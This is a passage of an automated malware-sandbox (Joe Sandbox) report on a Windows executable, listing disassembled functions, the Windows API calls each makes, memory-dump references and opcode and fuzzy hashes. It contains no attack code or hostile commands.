                                              • Opcode Fuzzy Hash: aca3f63284bdefd10ce0f4817197be06158ef22329d83544405f3cdfd8e1c64f
                                              • Instruction Fuzzy Hash: 3EA001D62AD552BD310C62966E07DBB121EC4D5BA5B31AA2FF602C6187A89058A52031
                                              Function 00CB4B2E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4B3B
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 8645eefe244f1df40cb5f05c8921045f82bc1dbc9f5d7dac19c23825295ce2f3
                                              • Instruction ID: b9a05723d165c18f94a9d6c4caf52ef9919acc7498c5fb7f8b03f08e6ec70b87
                                              • Opcode Fuzzy Hash: 8645eefe244f1df40cb5f05c8921045f82bc1dbc9f5d7dac19c23825295ce2f3
                                              • Instruction Fuzzy Hash: F9A001D62AD551BD310C6296AE07DBB121EC8E1B65B31A62FF601D6187A8A059A52031
                                              Function 00CB4CC6 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4C90
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 5621a3cfdd071f31fc8ed282776822781bef593ed0e222424f5454838470f164
                                              • Instruction ID: 414ebb3fe7c233eaad13274ae3a62b36acd3efc5cb93b9caa6e9591792b152f9
                                              • Opcode Fuzzy Hash: 5621a3cfdd071f31fc8ed282776822781bef593ed0e222424f5454838470f164
                                              • Instruction Fuzzy Hash: C2A001962AE156FC390C62926E46CBA071EC5C5FA2B328A2BF502C6583A89018952035
                                              Function 00CB4CDA Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4C90
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: ba21bc2b0460c3be8be6bcae953e19ae11353784c8d7ce5e5534983d41d7e2c9
                                              • Instruction ID: 414ebb3fe7c233eaad13274ae3a62b36acd3efc5cb93b9caa6e9591792b152f9
                                              • Opcode Fuzzy Hash: ba21bc2b0460c3be8be6bcae953e19ae11353784c8d7ce5e5534983d41d7e2c9
                                              • Instruction Fuzzy Hash: C2A001962AE156FC390C62926E46CBA071EC5C5FA2B328A2BF502C6583A89018952035
                                              Function 00CB4CD0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4C90
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 8ac05e37cf06d35361a0add0b66d40e70f1cd25f84de4e3ed2b0f017ac92b5a1
                                              • Instruction ID: 414ebb3fe7c233eaad13274ae3a62b36acd3efc5cb93b9caa6e9591792b152f9
                                              • Opcode Fuzzy Hash: 8ac05e37cf06d35361a0add0b66d40e70f1cd25f84de4e3ed2b0f017ac92b5a1
                                              • Instruction Fuzzy Hash: C2A001962AE156FC390C62926E46CBA071EC5C5FA2B328A2BF502C6583A89018952035
                                              Function 00CB4CE4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4CF1
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 5b45c1e3139d83fc5a09ba5f4d3b4a0034a962902b910c5d488dd023f8b3ca75
                                              • Instruction ID: f5ab41d3967e35fdad0d110b0a63a31df0eb095664abbd6f43bc13d61f5bbf84
                                              • Opcode Fuzzy Hash: 5b45c1e3139d83fc5a09ba5f4d3b4a0034a962902b910c5d488dd023f8b3ca75
                                              • Instruction Fuzzy Hash: EEA0019A2AE552BD310C62926E06CBA162ED4D1F61B31862BF501D6183A99128992071
                                              Function 00CB4CFF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4CF1
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: f5e86b0cec926d6ace508858db03e1d0bdac24eb494832340d90d8bd115bc584
                                              • Instruction ID: 7fb5e9c84d836d3b2d076a95e2627544dd50ccfe405221f310710caa5a41aca9
                                              • Opcode Fuzzy Hash: f5e86b0cec926d6ace508858db03e1d0bdac24eb494832340d90d8bd115bc584
                                              • Instruction Fuzzy Hash: B4A0019A2AE552BC310C62926E06CBA162ED4D5FA1B318A2BF502C6183A99128992031
                                              Function 00CB4CA8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4C90
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 6a76ceb59c7f874b86f2beb8f1effa58b73153f44d8860a4bf44c235e309f2a9
                                              • Instruction ID: 414ebb3fe7c233eaad13274ae3a62b36acd3efc5cb93b9caa6e9591792b152f9
                                              • Opcode Fuzzy Hash: 6a76ceb59c7f874b86f2beb8f1effa58b73153f44d8860a4bf44c235e309f2a9
                                              • Instruction Fuzzy Hash: C2A001962AE156FC390C62926E46CBA071EC5C5FA2B328A2BF502C6583A89018952035
                                              Function 00C91DE7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetDlgItemTextW.USER32(?,?,?), ref: 00C91DFC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ItemText
                                              • String ID:
                                              • API String ID: 3367045223-0
                                              • Opcode ID: 55fb839a2db69e8df6926706a093378d3e207810da8c43700225bfd4928c3333
                                              • Instruction ID: 204f1a84124b06b7c2850082424ad5da373c1c836a9fe660fa56b6382cdabb8f
                                              • Opcode Fuzzy Hash: 55fb839a2db69e8df6926706a093378d3e207810da8c43700225bfd4928c3333
                                              • Instruction Fuzzy Hash: 94C0EA31518240EF8B058B58E988E1ABBA6BB96311B518558F4588A120C331D921DB62
                                              Function 00CB4D13 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4CF1
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: f77c6fa33719b135f525bc5f19c3fcc85001896f0012b75d6b8f516f4954b7cf
                                              • Instruction ID: 7fb5e9c84d836d3b2d076a95e2627544dd50ccfe405221f310710caa5a41aca9
                                              • Opcode Fuzzy Hash: f77c6fa33719b135f525bc5f19c3fcc85001896f0012b75d6b8f516f4954b7cf
                                              • Instruction Fuzzy Hash: B4A0019A2AE552BC310C62926E06CBA162ED4D5FA1B318A2BF502C6183A99128992031
                                              Function 00C9E8D9 Relevance: 1.5, APIs: 1, Instructions: 5fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SetEndOfFile.KERNELBASE(?,00C9D115,?,?,?,?,?,?,?), ref: 00C9E8DC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: File
                                              • String ID:
                                              • API String ID: 749574446-0
                                              • Opcode ID: 1d6d3831dd23ddd2de3d659c1a8ec257149a6c656780ef89f0bea8cf41b3efe2
                                              • Instruction ID: d14e4400608f3f70120a81964190590b23acf45b5857a5f398914321d7316aa4
                                              • Opcode Fuzzy Hash: 1d6d3831dd23ddd2de3d659c1a8ec257149a6c656780ef89f0bea8cf41b3efe2
                                              • Instruction Fuzzy Hash: A3A00230201105CBDB411F31DE49B0E7B6ABF416D9719C0A8E40EC9071DB27CCA3EA45
                                              Function 00C9DE50 Relevance: 1.3, APIs: 1, Instructions: 28COMMON
                                              Download Yara Rule
                                              APIs
                                              • CloseHandle.KERNELBASE(?,?,00000001,00C9DE10,9CAA5719,?,00000000,00CC93B1,000000FF,?,00C9BEA6,?), ref: 00C9DE6B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID:
                                              • API String ID: 2962429428-0
                                              • Opcode ID: 44fb3558837b14f6e5182528bdb5e15c7862d989075459dae9475406adc1fbce
                                              • Instruction ID: c4f743f5a9acb282b55c105e903130cdbbfaaaaa7b5e349e14320de56033d177
                                              • Opcode Fuzzy Hash: 44fb3558837b14f6e5182528bdb5e15c7862d989075459dae9475406adc1fbce
                                              • Instruction Fuzzy Hash: EFF08270441B019ADF349A24C448752B6E46B21724F044B1ED0F79A5E4C370AA899A50

                                              Non-executed Functions

                                              Function 00C99B5C Relevance: 23.3, APIs: 9, Strings: 4, Instructions: 577fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _wcslen.LIBCMT ref: 00C99CB1
                                                • Part of subcall function 00C9AC11: GetCurrentProcess.KERNEL32(00000020,?), ref: 00C9AC2E
                                                • Part of subcall function 00C9AC11: GetLastError.KERNEL32 ref: 00C9AC72
                                                • Part of subcall function 00C9AC11: CloseHandle.KERNEL32(?), ref: 00C9AC81
                                                • Part of subcall function 00C92F45: _wcslen.LIBCMT ref: 00C92F50
                                              • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,00000000,?,00000001,?,00000000,00000000,?,\??\), ref: 00C99EE1
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,9CAA6261,00CC9937,000000FF), ref: 00C99F1E
                                              • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,02200000,00000000,?,00000000,?,00000000,?,00000001,?,00000000,00000000), ref: 00C9A0BF
                                                • Part of subcall function 00C914A7: _wcslen.LIBCMT ref: 00C914B8
                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00C9A127
                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,9CAA6261,00CC9937,000000FF), ref: 00C9A134
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,9CAA6261,00CC9937,000000FF), ref: 00C9A14A
                                              • RemoveDirectoryW.KERNEL32(00000000,00000009,?,?,?,?,?,?,?,?,?,9CAA6261,00CC9937,000000FF), ref: 00C9A18E
                                              • DeleteFileW.KERNEL32(00000000,00000009,?,?,?,?,?,?,?,?,?,9CAA6261,00CC9937,000000FF), ref: 00C9A196
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: CloseFileHandle_wcslen$CreateErrorLast$ControlCurrentDeleteDeviceDirectoryProcessRemove
                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                              • API String ID: 3517300771-3508440684
                                              • Opcode ID: b9e71aaf514d10c9d508b69211c29bbf1917a6107c596757889307321cace7f1
                                              • Instruction ID: ed66d1f621c41240af6d0fb46d7cbbc42f3d4ea9ffce2177fb13c96fb42e015b
                                              • Opcode Fuzzy Hash: b9e71aaf514d10c9d508b69211c29bbf1917a6107c596757889307321cace7f1
                                              • Instruction Fuzzy Hash: 59325E719002899FDF24DFA8CC8AFEE77B8EF15310F144169E859E7281DB349A48DB61
                                              Function 00CB1630 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 275windowfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00CB163A
                                                • Part of subcall function 00C91E44: GetDlgItem.USER32(00000000,00003021), ref: 00C91E88
                                                • Part of subcall function 00C91E44: SetWindowTextW.USER32(00000000,00CCC6C8), ref: 00C91E9E
                                              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00CB16BB
                                              • EndDialog.USER32(?,00000006), ref: 00CB16CE
                                              • GetDlgItem.USER32(?,0000006C), ref: 00CB16EA
                                              • SetFocus.USER32(00000000), ref: 00CB16F1
                                                • Part of subcall function 00C914A7: _wcslen.LIBCMT ref: 00C914B8
                                                • Part of subcall function 00C91DE7: SetDlgItemTextW.USER32(?,?,?), ref: 00C91DFC
                                              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00CB1763
                                              • FindFirstFileW.KERNEL32(?,?), ref: 00CB1783
                                              • FindClose.KERNEL32(00000000,?,00000000,00000000,00000000,00000099,?,?,00000000), ref: 00CB1826
                                              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00CB18AD
                                                • Part of subcall function 00C91150: _wcslen.LIBCMT ref: 00C9115B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Item$MessageSend$FindText_wcslen$CloseDialogFileFirstFocusH_prolog3_Window
                                              • String ID: %s %s$REPLACEFILEDLG
                                              • API String ID: 485132379-439456425
                                              • Opcode ID: 0af064ae4d9008636372bd91a317aabbd24101316d1e516dc6feb889af488d52
                                              • Instruction ID: 2ac2870d4329a8b1a1b2b40361643fa711e5cc4ae31ad8e573cb894df656dc96
                                              • Opcode Fuzzy Hash: 0af064ae4d9008636372bd91a317aabbd24101316d1e516dc6feb889af488d52
                                              • Instruction Fuzzy Hash: 1CA1B071940219AADF25EBB0CC9AFEEB77CAF05300F484198FA09B7091DB705F44AB61
                                              Function 00CC480E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: __floor_pentium4
                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                              • API String ID: 4168288129-2761157908
                                              • Opcode ID: 6ffa307b16988a6803a99d98947058a2effd82e8a59497a535f25f888b3b65d3
                                              • Instruction ID: 6a027875a62350d3850cccc36aedddb2da054b0b1c58b0f090ce387ce63f1e04
                                              • Opcode Fuzzy Hash: 6ffa307b16988a6803a99d98947058a2effd82e8a59497a535f25f888b3b65d3
                                              • Instruction Fuzzy Hash: 18C24B71E086288FDB29CE28DD50BEAB7B5EB84305F1541EED85DE7240E774AE819F40
                                              Function 00C93D9D Relevance: 6.1, APIs: 2, Strings: 1, Instructions: 857COMMON
                                              Download Yara Rule
                                              APIs
                                              • _strlen.LIBCMT ref: 00C9438C
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C94523
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_strlen
                                              • String ID: CMT
                                              • API String ID: 2172594012-2756464174
                                              • Opcode ID: dfd7f84466f0bf85d170d8f2604ded440926685e03ac23a21b847cdfa1e8254f
                                              • Instruction ID: 8aeef5f81bc0febbb2170b5819e7459fcded06e34bfb65a7a87ad454072256ce
                                              • Opcode Fuzzy Hash: dfd7f84466f0bf85d170d8f2604ded440926685e03ac23a21b847cdfa1e8254f
                                              • Instruction Fuzzy Hash: BF72E371A007458FCF18DF68C899BEA7BA1FF15300F08457DEC569B282DB709A46DB61
                                              Function 00CB6878 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                              Download Yara Rule
                                              APIs
